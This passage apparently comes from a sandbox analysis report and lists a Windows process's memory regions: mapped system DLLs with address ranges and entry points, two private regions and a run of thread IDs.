mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1912 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1913 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1914 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1915 start_va = 0x7ff87efa0000 end_va = 0x7ff87efa7fff monitored = 0 entry_point = 0x7ff87efa1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1916 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1917 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1918 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1919 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1920 start_va = 0x7ff87f9d0000 end_va = 0x7ff87fa76fff monitored = 0 entry_point = 0x7ff87f9db4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1921 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1922 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1923 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1924 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1925 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2017 start_va = 0x3c00000 end_va = 0x3e5cfff monitored = 0 entry_point = 0x3c88610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 2018 start_va = 0x3e60000 end_va = 0x405ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 2019 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 2020 start_va = 0x2a20000 end_va = 0x2b85fff monitored = 0 entry_point = 0x2a679f0 region_type = mapped_file name = "diagperf.dll" filename = "\\Windows\\System32\\diagperf.dll" (normalized: "c:\\windows\\system32\\diagperf.dll") Region: id = 2026 start_va = 0x810000 end_va = 0x819fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "aeevts.dll" filename = "\\Windows\\System32\\aeevts.dll" (normalized: "c:\\windows\\system32\\aeevts.dll") Region: id = 2027 start_va = 0x11a0000 end_va = 0x1279fff monitored = 0 entry_point = 0x11d3c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Thread: id = 150 os_tid = 0xfb0 Thread: id = 151 os_tid = 0xe54 Thread: id = 152 os_tid = 0x4b4 Thread: id = 153 os_tid = 0xbfc Thread: id = 154 os_tid = 0x1110 Thread: id = 155 os_tid = 0x110c Thread: id = 156 os_tid = 0xf50 Thread: id = 157 os_tid = 0xf4c Thread: id = 158 os_tid = 0xf48 Thread: id = 159 os_tid = 0xf20 Thread: id = 160 os_tid = 0xee8 Thread: id = 161 os_tid = 0xebc Thread: id = 162 os_tid = 0xea4 Thread: id = 163 os_tid = 0xdcc Thread: id = 164 os_tid = 0x6d8 Thread: id = 165 os_tid = 0x458 Thread: id = 166 os_tid = 0x444 Thread: id = 167 os_tid = 0x440 Thread: id = 168 os_tid = 0x414 Thread: id = 169 os_tid = 0x410 Thread: id = 170 os_tid = 0x260 Thread: id = 171 os_tid = 0x270 Thread: id = 172 os_tid = 0x148 Thread: id = 173 os_tid = 0x1b4 Thread: id = 174 os_tid = 0x1b8 Thread: id = 175 os_tid = 0x184 Thread: id = 176 os_tid = 0x37c